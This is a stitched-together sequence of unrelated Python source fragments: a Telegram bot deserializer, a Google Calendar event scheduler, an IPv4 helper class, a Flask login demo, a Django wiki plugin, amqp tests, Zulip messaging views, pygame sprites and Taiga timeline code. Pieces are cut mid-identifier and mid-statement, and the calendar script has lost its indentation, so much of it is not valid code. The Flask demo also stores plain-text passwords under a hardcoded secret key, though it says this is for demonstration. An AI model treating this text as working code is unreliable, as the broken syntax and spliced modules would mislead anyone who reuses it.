    def de_json(data):
        """Build an InlineQueryResultCachedVideo from a decoded JSON dict."""
        data = super(InlineQueryResultCachedVideo, InlineQueryResultCachedVideo).de_json(data)
        # Replace nested dicts with their object equivalents before expansion.
        data['reply_markup'] = InlineKeyboardMarkup.de_json(data.get('reply_markup'))
        data['input_message_content'] = InputMessageContent.de_json(data.get(
            'input_message_content'))
        return InlineQueryResultCachedVideo(**data)
|
ns an authorization server page
# in default web browser.
# The new credentials are also stored in the Storage object,
# which updates the credentials file.
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
if flags:
credentials = tools.run_flow(flow, storage, flags)
print (" storing credentials to " + USER_CREDENTIALS)
# authorize credentials
http = credentials.authorize(httplib2.Http())
return http
def useService(service_type):
    """ "Shortcut" to the service/API call
    Args:
        service_type (str): which service? calendar or url (urlshortener)
    Returns:
        build object kind of thing (google)
    """
    known_services = {
        "calendar": ("calendar", "v3"),
        "url": ("urlshortener", "v1"),
    }
    if service_type not in known_services:
        print (" wrong key for Google Service")
        exit()
    api_name, api_version = known_services[service_type]
    return build(serviceName=api_name, version=api_version, http=googleAuth())
def listEvents():
    """Print summary/start/location/description of every event on CALENDAR_ID.

    The Calendar API's events().list method returns paginated results, so the
    request is executed in a paging loop: list_next() returns the request for
    the next page, or None once all pages have been consumed.
    """
    service = useService('calendar')
    request = service.events().list(calendarId=CALENDAR_ID)
    # Loop until all pages have been processed.
    # Idiom fix: compare against None with `is not` (PEP 8), not `!=`.
    while request is not None:
        # Get the next page.
        response = request.execute()
        # Accessing the response like a dict object with an 'items' key
        # returns a list of item objects (events).
        for event in response.get('items', []):
            print ("--------------------------")
            # The event object is a dict object with a 'summary' key.
            print(event['summary'])
            print(event['start']['dateTime'])
            print(event['location'])
            print(event['description'])
        # Get the next request object by passing the previous request object to
        # the list_next method.
        request = service.events().list_next(request, response)
def scheduleEvent(list_schedule, event_data, isevent=True):
'''
Inserts the event into google calendar.
:param:list_schedule list list of dates
:param:event_data dict event data
:param:isevent bool is it event or a manual update? default true (event)
'''
cal_service = useService('calendar')
timezone = 'America/Argentina/Ushuaia'
if not isevent:
event = {}
event['summary'] = "Actualizacion sitio: changelog: " + event_data['start']
event['start'] = {'dateTime': event_data['start'], 'timeZone': timezone}
event['end'] = {'dateTime': event_data['end'], 'timeZone': timezone}
end_date_iso = event_data['end'].isoformat()
event['description'] = event_data['description']
#use recurrence so we dont have to create daily events within same time
tmp_date = end_date_iso + "Z" #doesnt seem to like timezone.
tmp_recurrence = tmp_date.replace("-","").replace(":","")
tmp_recurrence = 'RRULE:FREQ=DAILY;UNTIL=' + tmp_recurrence
event['recurrence'] = [tmp_recurrence]
executeCall(cal_service.events().insert(calendarId=CALENDAR_ID, body=event))
print(" Manual update added")
else:
'''
ifttt ingredients
Title | The event's title.
Description The event's description.
Where The location where the event takes place.
Starts ej August 23, 2011 at 10:00PM
Ends ej: August 23, 2011 at 11:00PM
'''
# so dirty
gcal_description = "#{city} {tags} {title} {shortURL}({human_date}{place})"
end_date_iso = event_data['end']['timestamp'].isoformat()
def _fecha_humana(date_time, abbr=False):
""" translate to | human dates (spanish, quick and dirty)
Args:
date_time (datetime object)
abbr (boolean) abreviate month names? default False
Returns:
str
"""
tmp = date_time.strftime('%d de //%m//, %H:%M hs')
tmp_month_number = tmp.split("//")[1].split("//")[0]
month = ""
if tmp_month_number == "01":
month = "en." if abbr else "enero"
if tmp_month_number == "02":
month = "febr." if abbr else "febrero"
if tmp_month_number == "03":
month = "mzo." if abbr else "marzo"
if tmp_month_number == "04":
month = "abr." if abbr else "abril"
if tmp_month_number == "05":
month = "my." if abbr else "mayo"
if tmp_month_number == "06":
month = "jun." if abbr else "junio"
if tmp_month_number == "07":
month = "jul." if abbr else "julio"
if tmp_month_number == "08":
month = "agt." if abbr else "agosto"
if tmp_month_number == "09":
month = "sept." if abbr else "septiembre"
if tmp_month_number == "10":
month = "oct." if abbr else "octubre"
if tmp_month_number == "11":
month = "nov." if abbr else "noviembre"
if tmp_month_number == "12":
month = "dic." if abbr else "diciembre"
tmp = tmp.replace("//" + tmp_month_number + "//", month)
return tmp
#cycle list
for date_time in list_schedule:
human_datetime_start = ""
event = {}
tags = ""
city = ""
place = ""
shortURL = ""
if event_data['city'] == "rio-grande":
city = "RioGrande"
else:
city = event_data['city'].title()
#event['reminders'] = dict()
#event['reminders']['useDefault'] = False #remove reminder, this is for myself
event['summary'] = event_data['title']
event['start'] = {'dateTime': date_time[0], 'timeZone': timezone}
event['end'] = {'dateTime': date_time[1], 'timeZone': timezone}
#human_datetime_end = _fecha_humana(event_data['start']['timestamp'], abbr=True) #the real date
human_datetime_end = event_data['start']['timestamp'].strftime('%d/%m, %H:%M hs')
# if not time set, remove the 00:00 added when creating the timestamp
if not event_data['start']['time']:
human_datetime_end = human_datetime_end.replace("00:00 hs","")
#if all day: {'date': eEnd}
print (" schedule from {} to {} until {}".format(
date_time[0].replace("T", " ").replace(":00-03:00","")
,date_time[1].replace("T", " ").replace(":00-03:00","")
, end_date_iso.split("T")[0]
)
)
if not event_data['location'] is "":
event['location'] = event_data['location']
if event['location']:
place = ", en " + event_data['location']
final_summary = event['summary']
tags = ""
if event_data['tags']:
#tags = " #" + event_data['tags'].replace(",", " #")
all_tags = event_data['tags'].split(",")
reminding_tags = list()
# shouldn't be doing this but it's quicker now than using regex
final_summary = " " + final_summary + " "
# and also shouldn't be doing this but we don't want to deal with accented letters
# and the tag stuff...
final_summary = final_summary.replace("ó","o").replace("í","i")
#use part of the title to include tags (saving space)
tmp_tag = ""
for tag in all_tags:
tmp_tag = " " + tag + " "
if tmp_tag.lower() in final_summary.lower():
pattern = re.compile( re.escape(tmp_tag), re.IGNORECASE )
final_summary = pattern.sub(" #" + tag, final_summary)
else:
reminding_tags.append(tag)
final_summary = final_summary.strip()
tags = " #".join(reminding_tags)
tags = "#" + tags
if event_data['short-url']:
shortURL = event_data['short-url'] + " "
event['description'] = gcal_description.format(
city=city, tags=tags, title=final_summary
, human_date=human_datetime_end, place=place
, shortURL=shortURL
)
#use recurrence so we dont have to create daily events within same time
#event['recurrence'] = ['RRULE:FREQ=DAILY;UNTIL=20151007T193000-03:00']
tmp_date = end_date_iso + "Z" #doesnt seem to like timezone.
tmp_recurrence = tmp_date.replace("-","").replace(":","")
tmp_recurrence = 'RRULE:FREQ=DAILY;UNTIL=' + tmp_recurrence
event['recurrence'] = [tmp_recurrence]
#newEvent = cal_service.events().insert(calendarId=CALENDAR_ID, body=event)
executeCall(cal_service.events().insert(calendarId=CALENDA |
#!/usr/bin/python
"""nrvr.util.ipaddress - Utilities regarding IP addresses
Class provided by this module is IPAddress.
Works in Linux and Windows.
Idea and first implementation - Leo Baschy <srguiwiz12 AT nrvr DOT com>
|
Contributor - Nora Baschy
Public repository - https://github.com/srguiwiz/nrvr-commander
Copyright (c) Nirvana Research 2006-2015.
Simplified BSD License"""
import re
class IPAddress(object):
    """Methods for multiple machines on one subnet.

    As implemented only supports IPv4.
    NOTE: this is Python 2 code (uses basestring, long, integer division and
    print statements in the demo below)."""
    # Four dot-separated groups of 1-3 digits, optionally surrounded by blanks.
    octetsRegex = re.compile(r"^\s*([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\s*$")
    @classmethod
    def asList(cls, ipaddress, rangeCheck=False):
        """For ipaddress="10.123.45.67" return mutable [10, 123, 45, 67].
        Accepts a string, an integer, or an existing sequence.
        If already a list, a copy is made and returned."""
        if isinstance(ipaddress, basestring):
            octetsMatch = IPAddress.octetsRegex.search(ipaddress)
            if not octetsMatch:
                raise Exception("won't recognize as IP address: {0}".format(ipaddress))
            octets = [octetsMatch.group(1),
                      octetsMatch.group(2),
                      octetsMatch.group(3),
                      octetsMatch.group(4)]
            for index, octet in enumerate(octets):
                octet = int(octet)
                # The regex already limits to 3 digits; only values 256..999
                # can slip through, caught here when rangeCheck is requested.
                if rangeCheck and octet > 255:
                    raise Exception("won't recognize as IP address because > 255: {0}".format(ipaddress))
                octets[index] = octet
            return octets
        elif isinstance(ipaddress, (int, long)):
            octets = []
            # Peel off one octet per iteration (Python 2 integer division).
            while ipaddress:
                octets.append(ipaddress % 256)
                ipaddress /= 256
            # Left-pad with zeros up to 4 octets, then restore big-endian order.
            octets += [0 for i in range(max(4 - len(octets), 0))]
            octets.reverse()
            return octets
        else:
            # force making a copy
            return list(ipaddress)
    @classmethod
    def asTuple(cls, ipaddress):
        """For ipaddress="10.123.45.67" return immutable (10, 123, 45, 67)."""
        if isinstance(ipaddress, tuple):
            return ipaddress
        elif isinstance(ipaddress, list):
            return tuple(ipaddress)
        else:
            return tuple(cls.asList(ipaddress))
    @classmethod
    def asString(cls, ipaddress):
        """For ipaddress=[10, 123, 45, 67] return "10.123.45.67"."""
        if isinstance(ipaddress, basestring):
            return ipaddress
        if isinstance(ipaddress, (int, long)):
            ipaddress = cls.asList(ipaddress)
        return ".".join(map(str, ipaddress))
    @classmethod
    def asInteger(cls, ipaddress):
        """For ipaddress=[10, 123, 45, 67] return 175844675.
        At the time of this writing, such an integer however is
        not accepted as input by other methods of this class."""
        octets = cls.asList(ipaddress) # must make a copy
        integer = 0
        # Horner-style accumulation, consuming octets big-endian first.
        while octets:
            integer = 256 * integer + octets.pop(0)
        return integer
    @classmethod
    def bitAnd(cls, one, other):
        """Octet-wise AND of two addresses; returns a list of octets."""
        if not isinstance(one, (list, tuple)):
            one = cls.asList(one)
        if not isinstance(other, (list, tuple)):
            other = cls.asList(other)
        octets = []
        for oneOctet, otherOctet in zip(one, other):
            octets.append(oneOctet & otherOctet)
        return octets
    @classmethod
    def bitOr(cls, one, other):
        """Octet-wise OR of two addresses; returns a list of octets."""
        if not isinstance(one, (list, tuple)):
            one = cls.asList(one)
        if not isinstance(other, (list, tuple)):
            other = cls.asList(other)
        octets = []
        for oneOctet, otherOctet in zip(one, other):
            octets.append(oneOctet | otherOctet)
        return octets
    @classmethod
    def bitNot(cls, one):
        """Octet-wise complement (within 8 bits) of an address."""
        if not isinstance(one, (list, tuple)):
            one = cls.asList(one)
        octets = []
        for oneOctet in one:
            # Mask to 8 bits so Python's signed ~ stays in 0..255.
            octets.append(~oneOctet & 255)
        return octets
    @classmethod
    def nameWithNumber(cls, stem, ipaddress, octets=1, separator="-"):
        """For stem="example" and ipaddress="10.123.45.67" return "example-067".
        If octets=2 return "example-045-067"."""
        name = stem
        ipaddress = IPAddress.asTuple(ipaddress)
        if not separator:
            # empty string instead of e.g. None
            separator = ""
        for index in range(-octets, 0):
            # create leading zeros, e.g. from "19" to "019"
            name += separator + "%03d" % ipaddress[index]
        return name
    @classmethod
    def numberWithinSubnet(cls, oneInSubnet, otherNumber, netmask="255.255.255.0"):
        """For oneInSubnet="10.123.45.67" and otherNumber="89" return [10, 123, 45, 89].
        For oneInSubnet="10.123.45.67" and otherNumber="89.34" and netmask="255.255.0.0" return [10, 123, 89, 34]."""
        if not isinstance(oneInSubnet, (list, tuple)):
            oneInSubnet = cls.asList(oneInSubnet)
        # less than stellar decoding of otherNumber, but it works in actual use cases
        if isinstance(otherNumber, int):
            # in theory handling more than 16 bits' 65536 would be desirable,
            # practically handling up to 16 bits' 65535 is enough
            if otherNumber <= 255:
                otherNumber = [otherNumber]
            else:
                otherNumber = [otherNumber >> 8, otherNumber & 255]
        if not isinstance(otherNumber, (list, tuple)):
            otherNumber = otherNumber.split(".")
        otherNumber = map(int, otherNumber)
        if not isinstance(netmask, (list, tuple)):
            netmask = cls.asList(netmask)
        complementOfNetmask = cls.bitNot(netmask)
        # Network part comes from oneInSubnet, host part from otherNumber.
        contributedBySubnet = cls.bitAnd(oneInSubnet, netmask)
        otherNumber = [0] * (len(contributedBySubnet) - len(otherNumber)) + otherNumber
        contributedByNumber = cls.bitAnd(otherNumber, complementOfNetmask)
        result = cls.bitOr(contributedBySubnet, contributedByNumber)
        return result
if __name__ == "__main__":
    # Manual smoke test: exercise each IPAddress classmethod with every
    # accepted input form and print the results for visual inspection
    # (Python 2 print statements).
    print IPAddress.asList("10.123.45.67")
    print IPAddress.asList((192, 168, 95, 17))
    print IPAddress.asList([192, 168, 95, 17])
    print IPAddress.asList(175844675)
    print IPAddress.asTuple("10.123.45.67")
    print IPAddress.asTuple([192, 168, 95, 17])
    print IPAddress.asTuple((192, 168, 95, 17))
    print IPAddress.asTuple(175844675)
    print IPAddress.asString([192, 168, 95, 17])
    print IPAddress.asString((192, 168, 95, 17))
    print IPAddress.asString("10.123.45.67")
    print IPAddress.asString(175844675)
    print IPAddress.asInteger("10.123.45.67")
    print IPAddress.asInteger([10,123,45,67])
    print IPAddress.bitAnd("10.123.45.67", "255.255.255.0")
    print IPAddress.bitOr(IPAddress.bitAnd("10.123.45.67", "255.255.255.0"), "0.0.0.1")
    print IPAddress.bitNot("1.2.3.4")
    print IPAddress.nameWithNumber("example", "10.123.45.67")
    print IPAddress.nameWithNumber("example", "10.123.45.67", octets=2)
    print IPAddress.nameWithNumber("example", "10.123.45.67", octets=3)
    print IPAddress.nameWithNumber("example", "10.123.45.67", octets=4)
    print IPAddress.numberWithinSubnet("10.123.45.67", "89")
    print IPAddress.numberWithinSubnet("10.123.45.67", 89)
    print IPAddress.numberWithinSubnet("10.123.45.67", "89.34", netmask="255.255.0.0")
    print IPAddress.numberWithinSubnet("10.123.45.67", 22818, netmask="255.255.0.0")
|
from flask import Flask, url_for, redirect, render_template, request
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import superadmin, login, wtf
from flask.ext.superadmin.contrib import sqlamodel
from wtforms.fields import TextField, PasswordField
from wtforms.validators import Required, ValidationError
# Create application
app = Flask(__name__)
# Dummy secret key so sessions work; use a real random secret in production
app.config['SECRET_KEY'] = '123456790'
# SQLite database stored in the file test.sqlite
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite'
# Echo every SQL statement to the log -- handy for this demo
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Create user model. For simplicity, it will store passwords in plain text.
# Obviously that's not right thing to do in real world application.
class User(db.Model):
    """Application user; doubles as the flask-login user object."""
    id = db.Column(db.Integer, primary_key=True)
    login = db.Column(db.String(80), unique=True)
    email = db.Column(db.String(120))
    # stored in plain text -- acceptable only because this is a demo app
    password = db.Column(db.String(64))

    # Flask-Login integration: the four methods flask-login expects
    def is_authenticated(self):
        return True

    def is_active(self):
        return True

    def is_anonymous(self):
        return False

    def get_id(self):
        return self.id

    # Required for administrative interface (row label)
    def __unicode__(self):
        return self.login
# Define login and registration forms (for flask-login)
class LoginForm(wtf.Form):
    """Login form; validation checks credentials against the database."""
    login = TextField(validators=[Required()])
    password = PasswordField(validators=[Required()])

    def get_user(self):
        """Return the User matching the submitted login name, or None."""
        return db.session.query(User).filter_by(login=self.login.data).first()

    def validate_login(self, field):
        matched = self.get_user()
        if matched is None:
            raise ValidationError('Invalid user')
        if matched.password != self.password.data:
            raise ValidationError('Invalid password')
class RegistrationForm(wtf.Form):
    """Sign-up form; rejects login names that are already taken."""
    login = TextField(validators=[Required()])
    email = TextField()
    password = PasswordField(validators=[Required()])

    def validate_login(self, field):
        taken = db.session.query(User).filter_by(login=self.login.data).count()
        if taken > 0:
            raise ValidationError('Duplicate username')
# Initialize flask-login
def init_login():
    """Create the flask-login LoginManager and register the user loader."""
    manager = login.LoginManager()
    manager.setup_app(app)

    @manager.user_loader
    def load_user(user_id):
        # flask-login stores the user id in the session; resolve it here
        return db.session.query(User).get(user_id)
# Create customized model view class
class MyModelView(sqlamodel.ModelView):
    """Model admin view that is only accessible to logged-in users."""
    def is_accessible(self):
        # hide the view from anonymous visitors
        return login.current_user.is_authenticated()
# Create customized index view class
class MyAdminIndexView(superadmin.AdminIndexView):
    """Admin index view that is only accessible to logged-in users."""
    def is_accessible(self):
        # hide the admin index from anonymous visitors
        return login.current_user.is_authenticated()
# Flask views
@app.route('/')
def index():
    """Public landing page; exposes the current login state to the template."""
    return render_template('index.html', user=login.current_user)
@app.route('/login/', methods=('GET', 'POST'))
def login_view():
    """Show the login form and start a session on valid credentials."""
    form = LoginForm(request.form)
    if form.validate_on_submit():
        # LoginForm.validate_login already verified user and password
        user = form.get_user()
        login.login_user(user)
        return redirect(url_for('index'))
    return render_template('form.html', form=form)
@app.route('/register/', methods=('GET', 'POST'))
def register_view():
    """Show the registration form and create the account on valid submit."""
    form = RegistrationForm(request.form)
    if form.validate_on_submit():
        user = User()
        # copy the validated form fields onto the new model instance
        form.populate_obj(user)

        db.session.add(user)
        db.session.commit()
        # log the fresh account straight in
        login.login_user(user)
        return redirect(url_for('index'))
    return render_template('form.html', form=form)
@app.route('/logout/')
def logout_view():
    """End the session and send the visitor back to the index page."""
    login.logout_user()
    return redirect(url_for('index'))
if __name__ == '__main__':
    # Initialize flask-login
    init_login()
    # Create the admin interface, rooted at the login-protected index view
    admin = superadmin.Admin(app, 'Auth', index_view=MyAdminIndexView())
    # Expose the User model in the admin
    admin.add_view(MyModelView(User, db.session))
    # Create DB tables (idempotent)
    db.create_all()
    # Start the app with the interactive debugger -- development only
    app.debug = True
    app.run()
|
# -*- coding: utf-8 -*-
from django.conf.urls.defaults import patterns, url
from django.utils.translation import ugettext_lazy as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from wiki.plugins.attachments import views
from wiki.plugins.attachments import models
from wiki.plugins.attachments import settings
from wiki.plugins.attachments.markdown_extensions import AttachmentExtension
from wiki.pl | ugins.notifications import ARTICLE_EDIT
class AttachmentPlugin(BasePlugin):
    """Wiki plugin wiring up attachment views, notifications and the
    attachment markdown extension."""
    #settings_form = 'wiki.plugins.notifications.forms.SubscriptionForm'
    slug = settings.SLUG
    urlpatterns = patterns('',
        url(r'^$', views.AttachmentView.as_view(), name='attachments_index'),
        url(r'^search/$', views.AttachmentSearchView.as_view(), name='attachments_search'),
        url(r'^add/(?P<attachment_id>\d+)/$', views.AttachmentAddView.as_view(), name='attachments_add'),
        url(r'^replace/(?P<attachment_id>\d+)/$', views.AttachmentReplaceView.as_view(), name='attachments_replace'),
        url(r'^history/(?P<attachment_id>\d+)/$', views.AttachmentHistoryView.as_view(), name='attachments_history'),
        url(r'^download/(?P<attachment_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
        url(r'^delete/(?P<attachment_id>\d+)/$', views.AttachmentDeleteView.as_view(), name='attachments_delete'),
        # NOTE(review): this name duplicates 'attachments_download' above;
        # reverse() can only resolve one of them -- confirm this is intended.
        url(r'^download/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
        url(r'^change/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentChangeRevisionView.as_view(), name='attachments_revision_change'),
    )
    # tab label and icon shown in the article UI
    article_tab = (_(u'Attachments'), "icon-file")
    article_view = views.AttachmentView().dispatch
    # List of notifications to construct signal handlers for. This
    # is handled inside the notifications plugin.
    notifications = [{'model': models.AttachmentRevision,
                      'message': lambda obj: (_(u"A file was changed: %s") if not obj.deleted else _(u"A file was deleted: %s")) % obj.get_filename(),
                      'key': ARTICLE_EDIT,
                      'created': True,
                      'get_article': lambda obj: obj.attachment.article}
                     ]
    markdown_extensions = [AttachmentExtension()]

    def __init__(self):
        #print "I WAS LOADED!"
        pass

registry.register(AttachmentPlugin)
|
from __future__ import absolute_import, unicode_literals
from case import Mock, patch
from amqp.five import text_t
from amqp.utils import (NullHandler, bytes_to_str, coro, get_errno, get_logger,
str_to_bytes)
class test_get_errno:
    """Tests for amqp.utils.get_errno."""

    def test_has_attr(self):
        err = KeyError('foo')
        err.errno = 23
        assert get_errno(err) == 23

    def test_in_args(self):
        err = KeyError(34, 'foo')
        err.args = (34, 'foo')
        assert get_errno(err) == 34

    def test_args_short(self):
        # a single non-matching arg yields a falsy errno
        assert not get_errno(KeyError(34))

    def test_no_args(self):
        assert not get_errno(object())
class test_coro:
    """Tests for the @coro decorator."""

    def test_advances(self):
        @coro
        def gen():
            yield 1
            yield 2
        stream = gen()
        # @coro primes the generator, so the first yielded value is consumed
        assert next(stream) == 2
class test_str_to_bytes:
    """Tests for amqp.utils.str_to_bytes."""

    def test_from_unicode(self):
        result = str_to_bytes(u'foo')
        assert isinstance(result, bytes)

    def test_from_bytes(self):
        result = str_to_bytes(b'foo')
        assert isinstance(result, bytes)

    def test_supports_surrogates(self):
        expected = '\ud83d\ude4f'.encode('utf-8', 'surrogatepass')
        assert str_to_bytes(u'\ud83d\ude4f') == expected
class test_bytes_to_str:
    """Tests for amqp.utils.bytes_to_str."""

    def test_from_unicode(self):
        result = bytes_to_str(u'foo')
        assert isinstance(result, text_t)

    def test_from_bytes(self):
        assert bytes_to_str(b'foo')

    def test_support_surrogates(self):
        # surrogate code points must round-trip unchanged
        assert bytes_to_str(u'\ud83d\ude4f') == u'\ud83d\ude4f'
class test_NullHandler:
    """Tests for amqp.utils.NullHandler."""
    def test_emit(self):
        # emit must be a silent no-op for any record
        NullHandler().emit(Mock(name='record'))
class test_get_logger:
    """Tests for amqp.utils.get_logger."""
    def test_as_str(self):
        # a string argument is resolved through logging.getLogger
        with patch('logging.getLogger') as getLogger:
            x = get_logger('foo.bar')
            getLogger.assert_called_with('foo.bar')
            assert x is getLogger()
    def test_as_logger(self):
        # a logger instance without handlers gets a NullHandler attached
        with patch('amqp.utils.NullHandler') as _NullHandler:
            m = Mock(name='logger')
            m.handlers = None
            x = get_logger(m)
            assert x is m
            x.addHandler.assert_called_with(_NullHandler())
|
_cached_fetch(lambda message_id: to_dict_cache_key_id(message_id, apply_markdown),
Message.get_raw_db_rows,
message_ids,
id_fetcher=id_fetcher,
cache_transformer=cache_transformer,
extractor=extract_message_dict,
setter=stringify_message_dict)
message_list = []
for message_id in message_ids:
msg_dict = message_dicts[message_id]
msg_dict.update({"flags": user_message_flags[message_id]})
msg_dict.update(search_fields.get(message_id, {}))
message_list.append(msg_dict)
statsd.incr('loaded_old_messages', len(message_list))
ret = {'messages': message_list,
"result": "success",
"msg": ""}
return json_success(ret)
@authenticated_json_post_view
def json_update_flags(request, user_profile):
    """JSON endpoint: thin wrapper around update_message_flags."""
    # removed stray trailing semicolon -- un-Pythonic leftover
    return update_message_flags(request, user_profile)
@has_request_variables
def update_message_flags(request, user_profile,
                         messages=REQ('messages', validator=check_list(check_int)),
                         operation=REQ('op'), flag=REQ('flag'),
                         all=REQ('all', validator=check_bool, default=False)):
    """Apply a flag operation to the given message ids for this user.

    The semantics of `operation`/`flag`/`all` are enforced downstream by
    do_update_message_flags.
    """
    # record the operation in the request log for debugging
    request._log_data["extra"] = "[%s %s]" % (operation, flag)
    do_update_message_flags(user_profile, operation, flag, messages, all)
    return json_success({'result': 'success',
                         'messages': messages,
                         'msg': ''})
def create_mirrored_message_users(request, user_profile, recipients):
    """For a mirrored message, validate every referenced user and create
    stub accounts as needed.

    Returns (True, sender_profile) on success, (False, None) when the
    request is missing data, the client is unrecognized, or a referenced
    user falls outside the allowed realm.
    """
    if "sender" not in request.POST:
        return (False, None)
    sender_email = request.POST["sender"].strip().lower()
    referenced_users = set([sender_email])
    if request.POST['type'] == 'private':
        for email in recipients:
            referenced_users.add(email.lower())
    # pick the realm-check and fullname rules matching the mirroring client
    if request.client.name == "zephyr_mirror":
        user_check = same_realm_zephyr_user
        fullname_function = compute_mit_user_fullname
    elif request.client.name == "irc_mirror":
        user_check = same_realm_irc_user
        fullname_function = compute_irc_user_fullname
    elif request.client.name in ("jabber_mirror", "JabberMirror"):
        user_check = same_realm_jabber_user
        fullname_function = compute_jabber_user_fullname
    else:
        # Unrecognized mirroring client
        return (False, None)
    for email in referenced_users:
        # Check that all referenced users are in our realm:
        if not user_check(user_profile, email):
            return (False, None)
    # Create users for the referenced users, if needed.
    for email in referenced_users:
        create_mirror_user_if_needed(user_profile.realm, email, fullname_function)
    sender = get_user_profile_by_email(sender_email)
    return (True, sender)
def same_realm_zephyr_user(user_profile, email):
    # Are the sender and recipient both @mit.edu addresses?
    # We have to handle this specially, inferring the domain from the
    # e-mail address, because the recipient may not exist in Zulip
    # and we may need to make a stub MIT user on the fly.
    try:
        validators.validate_email(email)
    except ValidationError:
        # a malformed address can never match
        return False
    domain = resolve_email_to_domain(email)
    return user_profile.realm.domain == "mit.edu" and domain == "mit.edu"
def same_realm_irc_user(user_profile, email):
    # Check whether the target email address is an IRC user in the
    # same realm as user_profile, i.e. if the domain were example.com,
    # the IRC user would need to be username@irc.example.com
    try:
        validators.validate_email(email)
    except ValidationError:
        return False
    domain = resolve_email_to_domain(email)
    # NOTE(review): replace() removes every "irc." occurrence, not just a
    # leading prefix -- confirm domains can never contain "irc." elsewhere.
    return user_profile.realm.domain == domain.replace("irc.", "")
def same_realm_jabber_user(user_profile, email):
    """Return True when the address belongs to the user's realm (with a
    special case mapping mit.edu addresses into the ist.mit.edu realm)."""
    try:
        validators.validate_email(email)
    except ValidationError:
        return False
    domain = resolve_email_to_domain(email)
    # The ist.mit.edu realm uses mit.edu email addresses so that their accounts
    # can receive mail.
    if user_profile.realm.domain == 'ist.mit.edu' and domain == 'mit.edu':
        return True
    return user_profile.realm.domain == domain
@authenticated_api_view
def api_send_message(request, user_profile):
    """API endpoint: delegate to the shared send_message_backend."""
    return send_message_backend(request, user_profile)
@authenticated_json_post_view
def json_send_message(request, user_profile):
    """Web-client JSON endpoint: delegate to the shared send_message_backend."""
    return send_message_backend(request, user_profile)
# We do not @require_login for send_message_backend, since it is used
# both from the API and the web service. Code calling
# send_message_backend should either check the API key or check that
# the user is logged in.
@has_request_variables
def send_message_backend(request, user_profile,
message_type_name = REQ('type'),
message_to = REQ('to', converter=extract_recipients, default=[]),
forged = REQ(default=False),
subject_name = REQ('subject', lambda x: x.strip(), None),
message_content = REQ('content'),
domain = REQ('domain', default=None),
local_id = REQ(default=None),
queue_id = REQ(default=None)):
client = request.client
is_super_user = request.user.is_api_super_user()
if forged and not is_super_user:
return json_error("User not authorized for this query")
realm = None
if domain and domain != user_profile.realm.domain:
if not is_super_user:
# The email gateway bot needs to be able to send messages in
# any realm.
return json_error("User not authorized for this query")
realm = get_realm(domain)
if not realm:
return json_error("Unknown domain " + domain)
if client.name in ["zephyr_mirror", "irc_mirror", "jabber_mirror", "JabberMirror"]:
# Here's how security works for mirroring:
#
# For private messages, the message must be (1) both sent and
# received exclusively by users in your realm, and (2)
# received by the forwarding user.
#
# For stream messages, the message must be (1) being forwarded
# by an API superuser for your realm and (2) being sent to a
# mirrored stream (any stream for the Zephyr and Jabber
# mirrors, but only streams with names starting with a "#" for
# IRC mirrors)
#
# The security checks are split between the below code
# (especially create_mirrored_message_users which checks the
# same-realm constraint) and recipient_for_emails (which
# checks that PMs are received by the forwarding user)
if "sender" not in request.POST:
return json_error("Missing sender")
if message_type_name != "private" and not is_super_user:
return json_error("User not authorized for this query")
(valid_input, mirror_sender) = \
create_mirrored_message_users(request, user_profile, message_to)
if not valid_input:
return json_error("Invalid mirrored message")
if client.name == "zephyr_mirror" and user_profile.realm.domain != "mit.edu":
return json_error("Invalid mirrored realm")
if (client.name == "irc_mirror" and message_type_name != "private" and
not message_to[0].startswith("#")):
return json_error("IRC stream names must start with #")
sender = mirror_sender
else:
sender = user_profile
ret = check_send_message(sender, client, message_type_name, message_to,
subject_name, message_content, forged=forged,
forged_timestamp = request.POST.get('time'),
forwarder_user_profile=user_profile, realm=realm,
local_id=local_id, sender_queue_id=queue_id)
return json_succ |
import pygame
from pygame.colordict import T | HECOLORS
import data
class Platform(pygame.sprite.Sprite):
    """A solid green rectangular sprite of the given pixel dimensions."""

    def __init__(self, width, height):
        pygame.sprite.Sprite.__init__(self)
        surface = pygame.Surface([width, height])
        surface.fill(THECOLORS["green"])
        self.image = surface
        self.rect = surface.get_rect()
class Trampoline(pygame.sprite.Sprite):
    """Sprite whose image is loaded from the bundled trampoline asset."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.image = data.load_image("trampoline.png")
        self.rect = self.image.get_rect()
|
# Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from django.utils import timezone
from django.utils.translation import ugettext as _
from taiga.projects.history import services as history_services
from taiga.projects.models import Project
from taiga.users.models import User
from taiga.projects.history.choices import HistoryType
from taiga.timeline.service import (push_to_timeline,
build_user_namespace,
build_project_namespace,
extract_user_info)
# TODO: Add events to followers timeline when followers are implemented.
# TODO: Add events to project watchers timeline when project watchers are implemented.
def _push_to_timeline(*args, **kwargs):
    """Dispatch a timeline push: through Celery when enabled, else inline."""
    if not settings.CELERY_ENABLED:
        push_to_timeline(*args, **kwargs)
    else:
        push_to_timeline.delay(*args, **kwargs)
def _push_to_timelines(project, user, obj, event_type, created_datetime, extra_data=None):
    """Fan a timeline event out to the project timeline and to the user
    profile timelines of everyone related to *obj* (actor, owner, assignee
    and watchers).

    :param project: project the event belongs to, or None for events with
        no project context (e.g. user creation).
    :param user: the user who performed the action.
    :param obj: the object the event is about.
    :param event_type: "create", "change" or "delete".
    :param created_datetime: timestamp stored with the timeline entries.
